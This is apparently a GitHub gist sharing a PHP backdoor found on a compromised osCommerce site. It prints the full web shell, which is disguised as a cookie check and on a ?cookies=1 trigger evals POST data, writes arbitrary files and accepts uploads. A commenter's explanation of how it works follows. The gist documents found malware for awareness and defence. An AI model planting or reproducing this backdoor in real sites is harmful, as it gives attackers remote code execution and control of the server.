Created
January 22, 2011 01:09
-
-
Save strathmeyer/790741 to your computer and use it in GitHub Desktop.
Some malicious code found in a hacked osCommerce instance
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if (@$_GET['cookies'] == 1) { | |
| echo 'Cookies must be enabled !'; | |
| $tf=''; | |
| if (@$_POST['tf']) { | |
| $tf = @$_POST['tf']; | |
| } | |
| if (@$_POST['e']) { | |
| eval(@$_POST['e']); | |
| } | |
| if (@$_POST['t']){ | |
| if ($tf != ''){ | |
| $f = fopen($tf, 'w'); | |
| fwrite($f, @$_POST['t']); | |
| fclose($f); | |
| } | |
| } | |
| if (@$_FILES['f']['name']!=''){ | |
| $tf = $_FILES['f']['name']; | |
| move_uploaded_file(@$_FILES['f']['tmp_name'],$tf); | |
| } | |
| exit; | |
| } | |
| ?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This code very, very evil.
Lines 11-13 allow it to execute almost any command on the host (any command that PHP has permission to do... which usually includes deleting files, sending mail, etc)
Lines 7-9 and 15-21 allow it to create a text file anywhere on the host (this could be another PHP file, for example)
Liens 7-9 and 23-26 allow it to upload an arbitrary file to the host.
An example of how this could be used: A hacker who knew of this vulnerability could upload a malicious file to your site, and then email out to thousands of people with a link the bad file on your site!
Interestingly, the code at the top doesn't really check to see if cookies are enabled. It checks to see if ?cookies=1 is in the URL in which case all the bad things are enabled. I'm guessing that first little bit is in there so that the code looks innocent.